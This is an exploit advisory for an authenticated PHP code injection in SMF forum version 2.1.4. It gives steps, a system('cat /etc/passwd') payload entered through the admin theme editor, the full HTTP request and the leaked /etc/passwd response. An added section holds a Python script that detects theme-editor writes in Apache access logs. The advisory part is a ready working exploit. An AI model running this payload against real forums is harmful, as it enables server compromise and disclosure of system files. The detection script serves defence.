## https://sploitus.com/exploit?id=PACKETSTORM:180255
# Exploit Title: Authenticated Code Injection - smfv2.1.4  
# Date: 8/2024  
# Exploit Author: Andrey Stoykov  
# Version: 2.1.4  
# Tested on: Ubuntu 22.04  
# Blog: https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html  
  
Code Injection Authenticated:  
  
Steps to Reproduce:  
  
1. Log in as admin  
2. Browse to "Current Theme"  
3. Click on "Modify Themes" > "SMF Default Theme"  
4. Click on Admin.template.php  
5. In the first box enter the PHP payload "<?php system('cat /etc/passwd') ?>"  
  
  
// HTTP POST request showing the code injection payload  
  
POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
[...]  
  
entire_file[]=<?php+system('cat /etc/passwd') ?>[...]  
  
  
// HTTP response showing /etc/passwd contents  
  
HTTP/1.1 200 OK  
Server: Apache  
Pragma: no-cache  
[...]  
  
[...]  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
[...]
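
// Detection note (added example, not part of the original advisory)

A write through the theme editor, like the POST request shown above, is identifiable in web server access logs by its query string (action=admin, area=theme, sa=edit), even though the request body is not logged. The script below is an added example, not code from the advisory author or the SMF project; it assumes Apache combined log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache combined log format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def smf_params(target):
    """Split an SMF query string, which separates parameters with ';' as well as '&'."""
    params = {}
    for part in re.split(r'[;&]', urlsplit(target).query):
        if part:
            key, _, value = part.partition('=')
            params[key.lower()] = value.lower()
    return params

def is_theme_edit_write(method, target):
    """True for a POST to the admin theme editor (action=admin, area=theme, sa=edit)."""
    p = smf_params(target)
    return (method == 'POST' and p.get('action') == 'admin'
            and p.get('area') == 'theme' and p.get('sa') == 'edit')

def find_theme_edits(lines):
    """Return (time, host, theme id, status) for each theme-editor write in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_theme_edit_write(m['method'], m['target']):
            th = smf_params(m['target']).get('th', '?')
            hits.append((m['time'], m['host'], th, int(m['status'])))
    return hits

# Constructed sample log lines (hypothetical hosts and paths, not from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Aug/2024:10:01:12 +0000] "GET /forum/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Aug/2024:10:02:40 +0000] "POST /forum/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1" 200 7311 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Aug/2024:10:03:05 +0000] "POST /forum/index.php?action=post2;board=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_theme_edits(SAMPLE_LOG):
        print('theme editor write:', hit)
```

Each hit is a template change made through the admin panel; correlate it with expected maintenance and with file modification times in the theme directory.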